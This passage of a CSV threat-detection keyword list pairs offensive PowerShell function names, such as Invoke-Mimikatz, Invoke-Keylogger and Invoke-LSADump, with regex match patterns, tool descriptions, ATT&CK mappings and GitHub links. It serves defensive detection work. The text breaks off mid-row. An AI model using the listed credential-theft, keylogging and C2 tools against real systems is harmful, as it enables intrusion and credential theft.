"*Invoke-Kerberoast.ps1*",".{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Keylogger.ps1*",".{0,1000}Invoke\-Keylogger\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Kirby*",".{0,1000}Invoke\-Kirby.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-KrbRelay*",".{0,1000}Invoke\-KrbRelay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-LazySign.ps1*",".{0,1000}Invoke\-LazySign\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Lockless*",".{0,1000}Invoke\-Lockless.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Locksmith.ps1*",".{0,1000}Invoke\-Locksmith\.ps1.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "*Invoke-LoginPrompt.ps1*",".{0,1000}Invoke\-LoginPrompt\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Invoke-LSADump*",".{0,1000}Invoke\-LSADump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-LsaProtectionCheck*",".{0,1000}Invoke\-LsaProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-LsaProtectionsCheck*",".{0,1000}Invoke\-LsaProtectionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-LSWMImplant*",".{0,1000}Invoke\-LSWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-M.i.m.i.k.a.t.z*",".{0,1000}Invoke\-M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-MachineRoleCheck*",".{0,1000}Invoke\-MachineRoleCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-MapDomainTrust*",".{0,1000}Invoke\-MapDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Merlin.ps1*",".{0,1000}Invoke\-Merlin\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-MetaTwin*",".{0,1000}Invoke\-MetaTwin.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*InvokeMeter.bat*",".{0,1000}InvokeMeter\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-MFASweep*",".{0,1000}Invoke\-MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*Invoke-MimiDoggies*",".{0,1000}Invoke\-MimiDoggies.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-Mimidogz*",".{0,1000}Invoke\-Mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-Mimidogz.ps1*",".{0,1000}Invoke\-Mimidogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","37","9","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Invoke-Mimikatz.json*",".{0,1000}Invoke\-Mimikatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","37","9","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z" "*Invoke-Mimikatz-old*",".{0,1000}Invoke\-Mimikatz\-old.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-MimikatzWDigestDowngrade*",".{0,1000}Invoke\-MimikatzWDigestDowngrade.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Mimikittenz*",".{0,1000}Invoke\-Mimikittenz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-MITM6*",".{0,1000}Invoke\-MITM6.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-ModifiableProgramsCheck*",".{0,1000}Invoke\-ModifiableProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Mongoose*",".{0,1000}Invoke\-Mongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-MonitorCredSniper*",".{0,1000}Invoke\-MonitorCredSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-MS16*",".{0,1000}Invoke\-MS16.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-MS16032*",".{0,1000}Invoke\-MS16032.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MS16032*",".{0,1000}Invoke\-MS16032.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MS16135*",".{0,1000}Invoke\-MS16135.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - 